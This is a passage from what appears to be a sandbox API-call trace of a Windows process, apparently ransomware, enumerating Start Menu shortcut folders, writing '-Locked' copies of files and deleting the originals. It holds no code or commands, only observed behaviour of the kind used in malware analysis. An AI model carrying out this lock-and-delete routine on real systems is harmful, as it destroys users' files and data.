ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x331f452f, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x331f452f, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Word 2016.lnk-Locked", cAlternateFileName="WORD20~2.LNK")) returned 0 [0299.871] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0299.872] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af15c) returned 1 [0299.872] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af168) returned 1 [0299.872] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessibility\\.", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessibility", lpFilePart=0x0) returned 0x42 [0299.872] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af164) returned 1 [0299.872] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessibility", nBufferLength=0x105, lpBuffer=0x1aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessibility", lpFilePart=0x0) returned 0x42 [0299.872] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessibility\\", nBufferLength=0x105, lpBuffer=0x1aec40, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessibility\\", lpFilePart=0x0) returned 0x43 [0299.873] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessibility\\*", lpFindFileData=0x1aee8c | out: lpFindFileData=0x1aee8c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x36990d0, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x36990d0, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0299.873] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x36990d0, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x36990d0, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0299.873] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x36990d0, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97362eb5, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9ee05c71, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x172, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop.ini", cAlternateFileName="")) returned 1 [0299.874] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x193904c1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x193904c1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x193904c1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4dc, dwReserved0=0x0, dwReserved1=0x0, cFileName="Speech Recognition.lnk", cAlternateFileName="")) returned 1 [0299.874] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0299.874] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0299.874] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af124) returned 1 [0299.874] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af130) returned 1 [0299.874] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af164) returned 1 [0299.874] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessibility", nBufferLength=0x105, lpBuffer=0x1aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessibility", lpFilePart=0x0) returned 0x42 [0299.875] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessibility\\", nBufferLength=0x105, lpBuffer=0x1aec40, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessibility\\", lpFilePart=0x0) returned 0x43 [0299.875] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessibility\\*", lpFindFileData=0x1aee8c | out: lpFindFileData=0x1aee8c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x36990d0, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x36990d0, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0299.875] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x36990d0, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x36990d0, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0299.875] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x36990d0, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97362eb5, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9ee05c71, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x172, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop.ini", cAlternateFileName="")) returned 1 [0299.875] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x193904c1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x193904c1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x193904c1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4dc, dwReserved0=0x0, dwReserved1=0x0, cFileName="Speech Recognition.lnk", cAlternateFileName="")) returned 1 [0299.876] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x193904c1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x193904c1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x193904c1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4dc, dwReserved0=0x0, dwReserved1=0x0, cFileName="Speech Recognition.lnk", cAlternateFileName="")) returned 0 [0299.876] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0299.876] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af124) returned 1 [0299.876] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af130) returned 1 [0299.876] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessibility\\Desktop.ini-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessibility\\Desktop.ini-Locked", lpFilePart=0x0) returned 0x55 [0299.876] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0299.876] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessibility\\Desktop.ini-Locked" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessibility\\desktop.ini-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0299.878] GetFileType (hFile=0x49c) returned 0x1 [0299.878] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0299.878] GetFileType (hFile=0x49c) returned 0x1 [0299.880] CloseHandle (hObject=0x49c) returned 1 [0299.880] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessibility\\Desktop.ini", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessibility\\Desktop.ini", lpFilePart=0x0) returned 0x4e [0299.880] DeleteFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessibility\\Desktop.ini" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessibility\\desktop.ini")) returned 1 [0299.882] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessibility\\Speech Recognition.lnk-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessibility\\Speech Recognition.lnk-Locked", lpFilePart=0x0) returned 0x60 [0299.882] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0299.883] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessibility\\Speech Recognition.lnk-Locked" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessibility\\speech recognition.lnk-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0299.888] GetFileType (hFile=0x49c) returned 0x1 [0299.888] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0299.888] GetFileType (hFile=0x49c) returned 0x1 [0299.890] CloseHandle (hObject=0x49c) returned 1 [0299.890] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessibility\\Speech Recognition.lnk", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessibility\\Speech Recognition.lnk", lpFilePart=0x0) returned 0x59 [0299.890] DeleteFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessibility\\Speech Recognition.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessibility\\speech recognition.lnk")) returned 1 [0299.892] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\.", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories", lpFilePart=0x0) returned 0x40 [0299.892] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af164) returned 1 [0299.892] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories", nBufferLength=0x105, lpBuffer=0x1aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories", lpFilePart=0x0) returned 0x40 [0299.892] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\", nBufferLength=0x105, lpBuffer=0x1aec40, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\", lpFilePart=0x0) returned 0x41 [0299.892] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\*", lpFindFileData=0x1aee8c | out: lpFindFileData=0x1aee8c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x7088bbcb, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x7088bbcb, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0299.893] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x7088bbcb, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x7088bbcb, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0299.894] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x36990d0, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x6c530990, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6c530990, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x5c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0299.894] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5851d393, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5851d393, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5851d393, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x49e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Math Input Panel.lnk", cAlternateFileName="")) returned 1 [0299.894] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x245a1c9a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x245a1c9a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x245a1c9a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x45a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Paint.lnk", cAlternateFileName="")) returned 1 [0299.894] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26abc5ba, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x26abc5ba, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x26abc5ba, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4bf, dwReserved0=0x0, dwReserved1=0x0, cFileName="Remote Desktop Connection.lnk", cAlternateFileName="")) returned 1 [0299.895] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37da94b9, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x37da94b9, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x37da94b9, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x46e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Snipping Tool.lnk", cAlternateFileName="")) returned 1 [0299.895] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x15b8914e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x15b8914e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x15baf3a9, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x448, dwReserved0=0x0, dwReserved1=0x0, cFileName="Steps Recorder.lnk", cAlternateFileName="")) returned 1 [0299.895] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37da94b9, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x37da94b9, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x37da94b9, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4a9, dwReserved0=0x0, dwReserved1=0x0, cFileName="Sticky Notes.lnk", cAlternateFileName="")) returned 1 [0299.895] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xf639e71, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xf639e71, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System Tools", cAlternateFileName="SYSTEM~1")) returned 1 [0299.895] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6ec61aae, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6ec61aae, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6ec61aae, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Tablet PC", cAlternateFileName="TABLET~1")) returned 1 [0299.895] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x571e447b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x571e447b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x571e447b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x448, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Fax and Scan.lnk", cAlternateFileName="")) returned 1 [0299.896] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34319950, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x34319950, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x34319950, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x543, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Media Player.lnk", cAlternateFileName="")) returned 1 [0299.896] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2203aecd, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2203aecd, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2203aecd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x482, dwReserved0=0x0, dwReserved1=0x0, cFileName="Wordpad.lnk", cAlternateFileName="")) returned 1 [0299.896] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5835376d, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5835376d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5835376d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x462, dwReserved0=0x0, dwReserved1=0x0, cFileName="XPS Viewer.lnk", cAlternateFileName="")) returned 1 [0299.896] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0299.896] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0299.897] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af124) returned 1 [0299.897] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af130) returned 1 [0299.897] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af164) returned 1 [0299.897] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories", nBufferLength=0x105, lpBuffer=0x1aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories", lpFilePart=0x0) returned 0x40 [0299.897] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\", nBufferLength=0x105, lpBuffer=0x1aec40, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\", lpFilePart=0x0) returned 0x41 [0299.897] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\*", lpFindFileData=0x1aee8c | out: lpFindFileData=0x1aee8c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x7088bbcb, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x7088bbcb, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0299.897] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x7088bbcb, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x7088bbcb, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0299.898] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x36990d0, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x6c530990, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6c530990, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x5c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0299.898] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5851d393, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5851d393, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5851d393, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x49e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Math Input Panel.lnk", cAlternateFileName="")) returned 1 [0299.898] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x245a1c9a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x245a1c9a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x245a1c9a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x45a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Paint.lnk", cAlternateFileName="")) returned 1 [0299.899] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26abc5ba, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x26abc5ba, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x26abc5ba, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4bf, dwReserved0=0x0, dwReserved1=0x0, cFileName="Remote Desktop Connection.lnk", cAlternateFileName="")) returned 1 [0299.899] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37da94b9, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x37da94b9, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x37da94b9, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x46e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Snipping Tool.lnk", cAlternateFileName="")) returned 1 [0299.899] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: 